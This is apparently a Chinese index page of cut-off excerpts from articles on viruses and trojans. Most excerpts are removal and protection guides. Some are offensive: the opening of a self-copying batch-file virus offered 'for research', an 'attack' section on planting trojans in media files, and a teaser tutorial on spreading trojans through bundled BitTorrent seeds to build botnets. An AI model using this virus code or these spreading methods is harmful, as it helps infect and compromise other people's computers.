这个东西最近好象又开始死灰复燃了,群里经常有人问,所以再这里再给大家发一下 在以下整个过程中不得双击分区盘,需要打开时用鼠标右键——打开一、关闭病毒进程Ctrl + Alt + Del 任务管理器,在进程中查找 sxs 或 SVOHOST(不是SVCHOST,相差一个字母),有的话就将它结束掉二、显示出被隐藏的系统文件运行——regeditHKE
以前有过一款国产木马,它有个好听的名字,叫做“广外女生”。这个木马是广东外语外贸大学“广外女生”网络小组的作品,它可以运行于WIN98,WIN98SE,WINME,WINNT,WIN2000或已经安装Winsock2.0的Win95/97上。与以往的木马相比,它具有体积更小、隐藏更为巧妙的特点。可以预料,在将来的日子里它会成为继“冰河”之后的又
“CIH”这个魔鬼已经被我们认识,现在,几乎所有的杀毒软件都可以清杀它。但是,万一它已经发作,破坏了主板上的BIOS芯片,怎么办呢?我有过的一次经历,成功的修复了被CIH病毒破坏的主板,供大家参考: KV300交给朋友帮忙去升级,近期又经常上网,10月25日(星期天)晚上去学校前,对老爸千叮咛万嘱咐:“明天千万别开
网络游戏玩家的账号被恶意盗窃,装备被盗卖,这样的事发生得实在太多了。我们时不时地就可以看到这样的新闻:“黑客在网吧机器中植入木马病毒,企图盗窃网络游戏账号……”网络游戏世界里,一件极品装备不知要花费玩家多少金钱、心血和不眠之夜,因此,玩家最为担心的事情,莫过于自己的虚拟人物身份被冒用,以及虚拟物品在
前两天,在Symantec系统中心中看到接受我服务器管理的机器日志显示,病毒文件rdriv.sys无法彻底删除。今天查了一些资料,整理后放在这里,需要的时候参考一下。下面的方法还未经证实,请慎重使用。 1.病毒现象 打开“网上邻居”显示“服务器没有设置事务处理”,将文件服务器的工作组改一下,就可以打开工作组了,但是没有1
五一长假给了很多网迷充分的时间去浏览网页,如果稍不留神儿逛到恶意网站上,就会发现自己的IE标题栏换成了其他网站的名字、默认主页成了他家的自留地……更恐怖的还能让你的系统禁止使用、格式化硬盘等。 只要我们掌握了一些对付此等恶意代码的“绝招”,就可尽情地放心冲浪了,本专题我们就来探讨一下恶意代码的类型及
相信 大家以前的QQ密码都是数字,那么现在我教大家一种方法,把自己的QQ密码变成文字!呵呵,现在的盗号木马确不能读取中文密码,相信这一招,可以避免你的QQ被盗!也可以向朋友炫耀一下----呵呵,自己的QQ密码是文字注意:现在一般用的盗号木马是阿拉QQ大盗和极限居! 步骤: 首先打开腾迅TM 然后选择文件→个人资料→
一些基本的命令往往可以在保护网络安全上起到很大的作用,下面几条命令的作用就非常突出。 一、检测网络连接如果你怀疑自己的计算机上被别人安装了木马,或者是中了病毒,但是手里没有完善的工具来检测是不是真有这样的事情发生,那可以使用Windows自带的网络命令来看看谁在连接你的计算机。具体的命令格式是:netstat an这
小编在这里为大家提供两则小技巧,以便帮你强行杀死“顽固不化”的病毒进程。 根据进程名查杀 这种方法是通过WinXP系统下的taskkill命令来实现的,在使用该方法之前,首先需要打开系统的进程列表界面,找到病毒进程所对应的具体进程名。 接着依次单击“开始→运行”命令,在弹出的系统运行框中,运行“cmd”命令;再在DOS命
网上的批处理病毒代码很少,我发一段我写的批处理给大家研究。我水平一般,也就只能写出这点东西了,大家多多包涵。废话不多说了,大家看代码,仅供研究,不要做坏事。 @echo off title You DEAD!!!!!!! set taskkill=s copy %0 %windir%\system32\cmd.bat attrib %windir%\sy
网络时代可不太平,谁没有遭遇过病毒或木马?从CIH、I Love You到红色代码、Nimda,从BO到冰河,无一不是网友经常懈逅的对象。怎么避免这些“艳遇”是广大用户孜孜以求的目标,不过,“道高一尺,魔高一丈”,“防”永远是落后的,主动消灭它们才是积极主动的。 要消灭它们,首先就要掌握病毒及木马是怎么入侵我们
在网络世界中,有人专事盗窃他人的个人账号。其中腾迅公司的QQ号及各种网络游戏的个人账号,已成为这些盗号者最垂涎欲滴的目标。 如果你有令人骄傲的QQ靓号,如果您的QQ号里有大笔Q币;或者你的网络游戏账号里有着让人羡慕的豪华装备——请收起你的骄傲吧,因为在许多网友羡慕地看你的同时,也可能有许多双贼溜溜的眼睛
玉兔病毒档案 玉兔病毒会试图破坏安全模式,使用户无法进入该模式杀毒。玉兔病毒在每个盘符生成病毒文件和Autorun.inf文件,只要双击盘符就可以进行感染。玉兔病毒会结束安全软件及其他一些常用的安全辅助工具。玉兔病毒还修改注册表导致用户无法正常查看隐藏的系统文件,从而达到不被查杀的目的。 巧避锋芒清除病
目前网络上最猖獗的病毒估计非木马程序莫数了,2005年木马程序的攻击性也有了很大的加强,在进程隐藏方面,做了较大的改动,不再采用独立的EXE可执行文件形式,而是改为内核嵌入方式、远程线程插入技术、挂接PSAPI等,这些木马也是目前最难对付的。本期就教你查找和清除线程插入式木马。 一、通过自动运行机制查木马
每当自己中毒或者被黑后总会发出上面的感叹!其实在你这样“怨天尤人”的时候有没有想过,造成这种情况的绝大部分的原因是你自己造成的。因为你自己的“爱机”在网上就是一座不设防的堡垒,不用说“黑客”就是普通人想满足一下好奇心对你的“隐私”进行一下探索也决非难事! 我想,没有人希望上面的事发生在自己身上吧?下
“CIH”这个魔鬼已经被我们认识,现在,几乎所有的杀毒软件都可以清杀它。但是,万一它已经发作,破坏了主板上的BIOS芯片,怎么办呢?我有过的一次经历,成功的修复了被CIH病毒破坏的主板,供大家参考: KV300交给朋友帮忙去升级,近期又经常上网,10月25日(星期天)晚上去学校前,对老爸千叮咛万嘱咐:“明天千万别开
p2p(peer to peer)蠕虫正在网络空间到处肆虐。当人们享受着p2p带来的便捷时,病毒也乘机将它作为一种全新的传播通道和生存空间。 一年多来最大规模的电子邮件病毒 storm在4月12日开始爆发,它通过垃圾邮件进行大量发送,这次攻击中还出现了新型的转变,垃圾邮件以提醒用户小心检测到的虚假病毒(例如,“trojan detected
近日,一类名为“AV终结者”的病毒正在威胁着广大用户的电脑安全,无论病毒特征还是危害程度,都有赶超熊猫烧香的迹象。 而与熊猫烧香过于“张扬”的特点不同,“AV终结者”的攻击手段更为隐蔽,但用户如果感染了该病毒,所有杀毒软件将被禁用;想用搜索引擎去查找一些解决办法,输入“杀毒”字样,浏览器窗口遂被关掉;安
如今网络上流传最为广泛的媒体文件有两类,一类是RM、RMVB文件,另一类是WMV、WMA文件,由于它们对流媒体的良好支持,使网络上的电影、音乐等媒体文件几乎都采用了这两种媒体文件格式,因此,如果在媒体文件中植入木马,那么媒体文件中木马独有的隐蔽性将会使受害者在不知不觉中被网页木马侵害,危害性可见一斑。 攻:
注:本文由新世纪网安基地原创作品本文章总节归纳了目前最流行的木马传播技术以及以后木马传播技术的发展趋势,内容相当丰富.相信看完本教程你一定会成为养鸡专业户. 一.目前流行木马传播技术.1.用BT制作木马种子利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件然后捆绑上自己的木马,做成种子,最后